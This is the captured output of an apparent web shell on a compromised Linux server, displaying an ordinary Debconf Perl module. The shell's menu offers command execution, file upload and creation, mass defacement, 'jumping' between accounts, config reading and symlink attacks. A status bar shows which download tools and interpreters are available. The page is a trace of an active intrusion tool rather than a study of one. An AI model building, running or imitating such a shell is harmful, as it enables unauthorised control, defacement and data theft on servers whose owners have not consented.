OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /libx32/../share/snapd/../doc/libblockdev-utils2/../liblvm2cmd2.03/../netplan/../libxml2/../libice6/../krb5-locales/../libisl22/../../perl5/Debconf/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/usr/bin/perl -w # This file was preprocessed, do not edit! package Debconf::Iterator; use strict; use base qw(Debconf::Base); sub iterate { my $this=shift; $this->callback->($this); } 1